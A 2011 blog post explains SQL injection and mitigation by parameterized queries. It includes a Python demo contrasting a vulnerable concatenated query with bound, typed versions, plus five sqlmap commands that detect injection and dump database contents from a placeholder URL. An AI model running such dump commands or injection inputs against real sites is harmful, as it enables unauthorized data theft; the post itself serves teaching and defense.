Saturday, October 22, 2011

Simple SQL Injection



A SQL injection attack consists of the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system, and in some cases issue commands to the operating system.

There are two complementary and successful methods of mitigating SQL injection attacks:
- Parameterized queries using bound, typed parameters
- Careful use of parameterized stored procedures

Parameterized queries are the easiest to adopt, and work in fairly similar ways among most web technologies in use today, including:
- Java
- .NET
- Perl
- PHP
- ColdFusion
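
To make the first mitigation concrete, here is an added example (not from the original post or the video) that puts a concatenated query beside its bound and typed forms. Python and its built-in sqlite3 module are used only because they run anywhere; the table, rows and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Build an in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users (name, secret) VALUES (?, ?)",
        [("alice", "alice-secret"), ("bob", "bob-secret")],
    )
    return conn

def lookup_concatenated(conn, name):
    """Vulnerable: the input is pasted into the SQL text and parsed as SQL."""
    query = "SELECT name, secret FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()

def lookup_parameterized(conn, name):
    """Hardened: the SQL text is fixed; the input is bound as a value only."""
    return conn.execute(
        "SELECT name, secret FROM users WHERE name = ?", (name,)
    ).fetchall()

def lookup_typed_id(conn, raw_id):
    """Bound and typed: reject anything that is not an integer before binding."""
    try:
        user_id = int(raw_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    return conn.execute(
        "SELECT name FROM users WHERE id = ?", (user_id,)
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    hostile = "nobody' OR '1'='1"  # constructed input containing a quote
    print("concatenated :", lookup_concatenated(db, hostile))   # every row comes back
    print("parameterized:", lookup_parameterized(db, hostile))  # no row matches
    print("benign       :", lookup_parameterized(db, "alice"))
    try:
        lookup_typed_id(db, "1 OR 1=1")
    except ValueError as exc:
        print("typed id     :", exc)
```

The same pattern applies in each of the languages listed above: the query text stays constant and user input only ever reaches the database as a bound value.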

The above video demonstrates a successful SQL injection attack using sqlmap. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It can be found at http://sqlmap.sourceforge.net

Simple steps used in the video example:
### see if the page is injectable

1. './sqlmap.py -u http://yoursitehere.com/vulnerablefile'

### get database names

2. './sqlmap.py -u http://yoursitehere.com/vulnerablefile --dbs'

### get table names
3. './sqlmap.py -u http://yoursitehere.com/vulnerablefile -D databasename --tables'

### get column names
4. './sqlmap.py -u http://yoursitehere.com/vulnerablefile -D databasename -T tablename --columns'

### get the data
5. './sqlmap.py -u http://yoursitehere.com/vulnerablefile -D databasename -T tablename -C column1,column2 --dump'

Wiredwizrd

Morgan Todd Lewistown, PA
